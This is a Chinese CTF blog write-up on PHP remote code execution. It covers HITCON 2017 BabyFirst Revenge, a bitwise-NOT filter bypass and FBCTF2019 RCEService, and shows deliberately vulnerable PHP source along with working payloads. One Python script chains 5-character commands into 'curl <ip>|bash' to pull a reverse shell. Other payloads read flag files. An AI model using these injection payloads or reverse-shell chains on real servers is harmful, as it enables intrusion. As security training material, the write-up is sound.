<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-48x48-next.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web," />










<meta name="description" content="前言这里用来记录一下自己做题过程中遇到有趣的RCE～ 5个字符getshell题目：BabyFirst Revenge HITCON CTF 2017的题目，之前已经了解过思路，还是挺有意思的。 源码： 1234567891011121314&lt;?php   echo $_SERVER[&#39;REMOTE_ADDR&#39;].&quot;\n&quot;;   $sandbox &#x3D; &#39;.&#x2F;sanbox&#39;;   mkdir(">
<meta property="og:type" content="article">
<meta property="og:title" content="RCE的那些事儿">
<meta property="og:url" content="https://www.sketchplane.top/2020/04/07/RCE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B%E5%84%BF/index.html">
<meta property="og:site_name" content="sketch_pl4ne">
<meta property="og:description" content="前言这里用来记录一下自己做题过程中遇到有趣的RCE～ 5个字符getshell题目：BabyFirst Revenge HITCON CTF 2017的题目，之前已经了解过思路，还是挺有意思的。 源码： 1234567891011121314&lt;?php   echo $_SERVER[&#39;REMOTE_ADDR&#39;].&quot;\n&quot;;   $sandbox &#x3D; &#39;.&#x2F;sanbox&#39;;   mkdir(">
<meta property="article:published_time" content="2020-04-07T13:40:18.000Z">
<meta property="article:modified_time" content="2020-09-09T14:52:15.778Z">
<meta property="article:author" content="sketch_pl4ne">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.sketchplane.top/2020/04/07/RCE的那些事儿/"/>





  <title>RCE的那些事儿 | sketch_pl4ne</title>
  








<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="sketch_pl4ne" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
    <link rel="stylesheet" href="/dist/APlayer.min.css">
    <div id="aplayer"></div>
    <script type="text/javascript" src="/dist/APlayer.min.js"></script>
    <script type="text/javascript" src="/dist/music.js"></script>
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">sketch_pl4ne</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.sketchplane.top/2020/04/07/RCE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B%E5%84%BF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sketch_pl4ne">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sketch_pl4ne">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">RCE的那些事儿</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-07T21:40:18+08:00">
                2020-04-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  6
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这里用来记录一下自己做题过程中遇到有趣的RCE～</p>
<h2 id="5个字符getshell"><a href="#5个字符getshell" class="headerlink" title="5个字符getshell"></a>5个字符getshell</h2><p>题目：<strong>BabyFirst Revenge</strong></p>
<p>HITCON CTF 2017的题目，之前已经了解过思路，还是挺有意思的。</p>
<p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="keyword">echo</span> $_SERVER[<span class="string">'REMOTE_ADDR'</span>].<span class="string">"\n"</span>;</span><br><span class="line">   $sandbox = <span class="string">'./sanbox'</span>;</span><br><span class="line">   mkdir($sandbox);</span><br><span class="line">   chdir($sandbox);</span><br><span class="line">   <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">       <span class="keyword">echo</span> $_GET[<span class="string">'cmd'</span>].<span class="string">'&lt;br&gt;'</span>;</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">"success"</span>;</span><br><span class="line">       exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">   &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">       @exec(<span class="string">'/bin/rm -rf '</span> . $sandbox);</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">"failed"</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p>Linux中，使用<code>\</code>可以换行输入命令：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~$ who\</span><br><span class="line"><span class="meta">&gt;</span><span class="bash"> am\</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash"> i</span></span><br><span class="line">adu1t</span><br></pre></td></tr></table></figure>

<p>另外，命令不需要完全正确，只需要包含有正确的命令即可执行：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~$ cat 1.txt </span><br><span class="line">sketch_pl4ne_wants_a_girlfriend.</span><br><span class="line">who\</span><br><span class="line">am\</span><br><span class="line">i</span><br><span class="line"></span><br><span class="line">adu1t@ubuntu:~$ sh 1.txt</span><br><span class="line">1.txt: 1: 1.txt: sketch_pl4ne_wants_a_girlfriend.: not found</span><br><span class="line">adu1t</span><br></pre></td></tr></table></figure>

<p>&gt;x，创建一个名为x的空文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~/Desktop$ &gt;x</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls</span><br><span class="line">x</span><br></pre></td></tr></table></figure>

<p><code>ls -t</code>命令，将创建的文件按创建时间排序(后创建在前)：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~/Desktop$ &gt;1</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;2</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;3</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls</span><br><span class="line">1  2  3</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls -t</span><br><span class="line">3  2  1</span><br></pre></td></tr></table></figure>

<p>知道这些之后我们应该就能理解思路了。</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>利用<code>ls -t</code> 构造含有恶意代码的文件名序列，输出到文件<code>a</code>中，sh 执行即可。</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> quote</span><br><span class="line"></span><br><span class="line">payload = [</span><br><span class="line">    <span class="comment"># 构造b文件，里面是构造的ls -t&gt;a命令</span></span><br><span class="line">    <span class="string">"&gt;l\\"</span>,</span><br><span class="line">    <span class="string">"&gt;s\ \\"</span>,</span><br><span class="line">    <span class="string">"&gt;\&gt;a"</span>,</span><br><span class="line">    <span class="string">"&gt;-t\\"</span>,</span><br><span class="line">    <span class="string">"ls&gt;b"</span>,</span><br><span class="line">    <span class="string">"ls&gt;&gt;b"</span>,</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 构造 curl 192.168.0.7|bash 这里ip的index文件里写反弹shell的语句然后监听对应端口</span></span><br><span class="line">    <span class="comment"># 注意两个点：不要创建同名文件(覆盖);不要以.x创建文件(ls命令不会显示这个文件，导致命令缺失)</span></span><br><span class="line">    <span class="string">"&gt;sh"</span>,</span><br><span class="line">    <span class="string">"&gt;ba\\"</span>,</span><br><span class="line">    <span class="string">"&gt;\|\\"</span>,</span><br><span class="line">    <span class="string">"&gt;7\\"</span>,</span><br><span class="line">    <span class="string">"&gt;0.\\"</span>,</span><br><span class="line">    <span class="string">"&gt;8.\\"</span>,</span><br><span class="line">    <span class="string">"&gt;16\\"</span>,</span><br><span class="line">    <span class="string">"&gt;2.\\"</span>,</span><br><span class="line">    <span class="string">"&gt;19\\"</span>,</span><br><span class="line">    <span class="string">"&gt;\\"</span>,</span><br><span class="line">    <span class="string">"&gt;\ \\"</span>,</span><br><span class="line">    <span class="string">"&gt;rl\\"</span>,</span><br><span class="line">    <span class="string">"&gt;cu\\"</span>,</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 执行命令</span></span><br><span class="line">    <span class="string">"sh b"</span>,</span><br><span class="line">    <span class="string">"sh a"</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">r = requests.get(<span class="string">'http://192.168.246.129/index.php?reset=1'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> payload:</span><br><span class="line">    <span class="keyword">assert</span> len(i) &lt;= <span class="number">5</span></span><br><span class="line">    requests.get(<span class="string">'http://192.168.246.129/index.php?cmd='</span> + quote(i))</span><br><span class="line">    <span class="comment"># print r.text</span></span><br><span class="line">    <span class="keyword">print</span> i</span><br><span class="line">    sleep(<span class="number">0.5</span>)</span><br></pre></td></tr></table></figure>

<p>这里只分析命令<code>ls -t</code>的构造过程，因为相对于上一个版本(<del>7个字符还是几个，我给忘了</del>)，难点在于这条命令超过了字符数限制，其他的构造完全可以以数量弥补字符数。</p>
<p>我们单独拎出来看：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~/Desktop$ &gt;l\\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;s\ \\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;\&gt;a</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;-t\\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls&gt;b</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls&gt;&gt;b</span><br><span class="line">adu1t@ubuntu:~/Desktop$ cat -n b</span><br><span class="line">     1	&gt;a</span><br><span class="line">     2	b</span><br><span class="line">     3	l\</span><br><span class="line">     4	s \</span><br><span class="line">     5	-t\</span><br><span class="line">     6	&gt;a</span><br><span class="line">     7	b</span><br><span class="line">     8	l\</span><br><span class="line">     9	s \</span><br><span class="line">    10	-t\</span><br></pre></td></tr></table></figure>

<p>可以看到，这样确实在3-5行处构造出了我们想要的代码<code>ls -t&gt;a</code>。</p>
<p>说一下这里比较细节的几个地方吧：</p>
<ul>
<li>s必须和空格做连体婴儿，因为空格打头会排在所有字母数字之前 :(</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adu1t@ubuntu:~/Desktop$ &gt;\ </span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls</span><br><span class="line">' '   1   2   a   b</span><br></pre></td></tr></table></figure>



<ul>
<li>输出的文件名也是有讲究的，简单来说，我们要构造的第一次执行的文件的字母排序要在第二次执行的文件字母排序的后面。也就是这里的ascii(‘a’)&lt;ascii(‘b’)，原因是<code>&gt;a</code>文件会排在<code>b</code>文件的前面，这里自己试验就知道了。</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 错误示范</span></span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;l\\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;s\ \\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;\&gt;b</span><br><span class="line">adu1t@ubuntu:~/Desktop$ &gt;-t\\</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls&gt;a</span><br><span class="line">adu1t@ubuntu:~/Desktop$ ls&gt;&gt;a</span><br><span class="line">adu1t@ubuntu:~/Desktop$ cat a</span><br><span class="line">a</span><br><span class="line"><span class="meta">&gt;</span><span class="bash">b</span></span><br><span class="line">l\</span><br><span class="line">s \</span><br><span class="line">-t\</span><br><span class="line">a</span><br><span class="line"><span class="meta">&gt;</span><span class="bash">b</span></span><br><span class="line">l\</span><br><span class="line">s \</span><br><span class="line">-t\</span><br></pre></td></tr></table></figure>

<p>后面构造curl命令反弹shell我写的脚本注释已经很清楚了，不多赘述。</p>
<h2 id="取反getshell"><a href="#取反getshell" class="headerlink" title="取反getshell"></a>取反getshell</h2><p><strong>仅适用于php7.0版本！</strong></p>
<p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'code'</span>]))&#123;</span><br><span class="line">    $code = $_GET[<span class="string">'code'</span>];</span><br><span class="line">    <span class="keyword">if</span>(strlen($code)&gt;<span class="number">35</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Long."</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/[A-Za-z0-9_$]+/"</span>,$code))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"NO."</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">eval</span>($code);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="前置知识-1"><a href="#前置知识-1" class="headerlink" title="前置知识"></a>前置知识</h3><p>php7.0.支持以下格式执行函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">($a)();</span><br></pre></td></tr></table></figure>

<p><code>~</code>取反运算符，可以将字符串取反，两次取反即可用于构造payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> urlencode(~<span class="string">'system'</span>);</span><br></pre></td></tr></table></figure>

<p>这样可以执行系统命令：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="string">"?&gt;&lt;?=`ls`?&gt;"</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="思路1"><a href="#思路1" class="headerlink" title="思路1"></a>思路1</h3><p>先将被过滤的字符取反并编码，再在输入处取反还原即可。</p>
<h3 id="脚本-1"><a href="#脚本-1" class="headerlink" title="脚本"></a>脚本</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://localhost/ctf/no_char_and_num_rce/index.php?code="</span></span><br><span class="line">payload = <span class="string">"(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);"</span>  <span class="comment"># system('cat /flag');</span></span><br><span class="line">r = requests.get(url+payload)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

<h3 id="思路2"><a href="#思路2" class="headerlink" title="思路2"></a>思路2</h3><p>如果php版本不是7.0的话，那么可以考虑使用通配符读取文件。</p>
<h3 id="脚本-2"><a href="#脚本-2" class="headerlink" title="脚本"></a>脚本</h3><p>这里通配符匹配有点玄学，我复现没有成功，贴一个payload吧。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=<span class="meta">?&gt;</span><span class="meta">&lt;?</span>=`/???/??? ????.???`<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="绕过preg-match"><a href="#绕过preg-match" class="headerlink" title="绕过preg_match()"></a>绕过preg_match()</h2><p>题目：<strong>[FBCTF2019]RCEService</strong></p>
<p>考察点：<code>preg_match()</code>只对第一行进行匹配，当我们在输入点两端输入回车符<code>%0a</code>时，可以绕过过滤，当然这里的前提是没有对两端过滤。</p>
<p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">putenv(<span class="string">'PATH=/home/rceservice/jail'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_REQUEST[<span class="string">'cmd'</span>])) &#123;</span><br><span class="line">  $json = $_REQUEST[<span class="string">'cmd'</span>];</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!is_string($json)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Hacking attempt detected&lt;br/&gt;&lt;br/&gt;'</span>;</span><br><span class="line">  &#125; <span class="keyword">elseif</span> (preg_match(<span class="string">'/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/'</span>, $json)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Hacking attempt detected&lt;br/&gt;&lt;br/&gt;'</span>;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Attempting to run command:&lt;br/&gt;'</span>;</span><br><span class="line">    $cmd = json_decode($json, <span class="keyword">true</span>)[<span class="string">'cmd'</span>];</span><br><span class="line">    <span class="keyword">if</span> ($cmd !== <span class="keyword">NULL</span>) &#123;</span><br><span class="line">      system($cmd);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">'Invalid input'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;br/&gt;&lt;br/&gt;'</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>payload如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=&#123;%<span class="number">0</span>a<span class="string">"cmd"</span>:<span class="string">"/bin/cat /home/rceservice/flag"</span>%<span class="number">0</span>a&#125;</span><br></pre></td></tr></table></figure>



<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>慢慢走出来了，毕竟世界上还有那么多美好的东西。</p>
<p>和你。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/22/NJCTF_WP/" rel="next" title="NJUPT CTF writeup">
                <i class="fa fa-chevron-left"></i> NJUPT CTF writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/09/09/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-welpwn/" rel="prev" title="攻防世界-welpwn">
                攻防世界-welpwn <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="sketch_pl4ne" />
            
              <p class="site-author-name" itemprop="name">sketch_pl4ne</p>
              <p class="site-description motion-element" itemprop="description">世上的不公都是当事人能力不足导致的</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="glzjin" target="_blank">glzjin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lihuaiqiu.github.io/" title="离怀秋" target="_blank">离怀秋</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/wfzWebSecuity/" title="tr1ple" target="_blank">tr1ple</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://southsea.st/" title="南溟" target="_blank">南溟</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
